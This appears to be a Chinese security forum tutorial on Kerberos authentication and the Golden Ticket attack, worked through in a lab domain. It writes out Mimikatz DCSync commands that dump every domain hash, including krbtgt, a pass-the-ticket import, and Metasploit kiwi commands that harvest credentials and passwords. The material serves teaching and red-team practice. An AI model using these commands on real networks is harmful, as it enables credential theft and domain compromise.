Kerberos认证
介绍
Kerberos是一种计算机网络授权协议,用来在非安全网络中,对个人通信以安全的手段进行身份认证。
这个词又指麻省理工学院为这个协议开发的一套计算机软件。
认证流程
提示:
AS(Authentication Server) 认证服务器
KDC(Key Distribution Center) 密钥分发中心
TGT(Ticket Granting Ticket) 票据授权票据(票据的票据)
TGS(Ticket Granting Server) 票据授权服务器
ACL(Access Control Lists) 访问控制列表
DC(Domain Controller) 域控制器
AD(Active Directory) 活动目录
Client 客户端
Server 服务端
详细流程图
![图片[1]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319105900120-image.png)
黄金票据
原理
在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个 Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。
票据条件:
- 域名称
- 域的 SID 值
- 域的 KRBTGT 账号的 HASH
- 伪造D的任意用户名
实验环境
机器:
12server4
AD01
域名:
redteam.club
Mimikatz
12server4上操作
信息收集
前提域管权限#导出hash
privilege::debug
lsadump::dcsync /domain:redteam.club /all /csv(lsadump::lsa /inject)
##一条命令
mimikatz.exe “privilege::debug” “lsadump::dcsync /domain:redteam.club /all /csv” “exit
![图片[2]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319105920504-image.png)
![图片[3]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319105942857-image.png)
![图片[4]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319105953140-image.png)
![图片[5]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110004667-image.png)
导入
#清除票据
kerberos::purge
#导入票据
kerberos::ptt C:\Users\ticket.kirbi
![图片[6]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110021582-image.png)
Metasploit
12server4上操作
system权限信息收集
#信息收集
load kiwi #导入kiwi模块
##提示:以下需要system权限
creds_all #列举所有凭据
creds_kerberos #列举所有kerberos凭据
kiwi_cmd sekurlsa::logonpasswords #抓密码和hash
![图片[7]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110036835-image.png)
![图片[8]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110051740-image.png)
![图片[9]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110106857-image.png)
域管权限信息收集
#信息收集(需要域管权限)
kiwi_cmd “lsadump::dcsync /domain:redteam.club /user:krbtgt” #krbtgt账户的密码hash值
kerberos_ticket_list #列举kerberos票据
kerberos_ticket_purge #清除kerberos票据
![图片[10]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110122795-image.png)
![图片[11]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110138143-image.png)
![图片[12]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110152803-image.png)
![图片[13]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110202356-image.png)
![图片[14]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110217440-image.png)
![图片[15]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110229911-image.png)
![图片[16]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110236364-image.png)
![图片[17]-Kerberos认证和黄金票据-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240319110239572-image.png)
暂无评论内容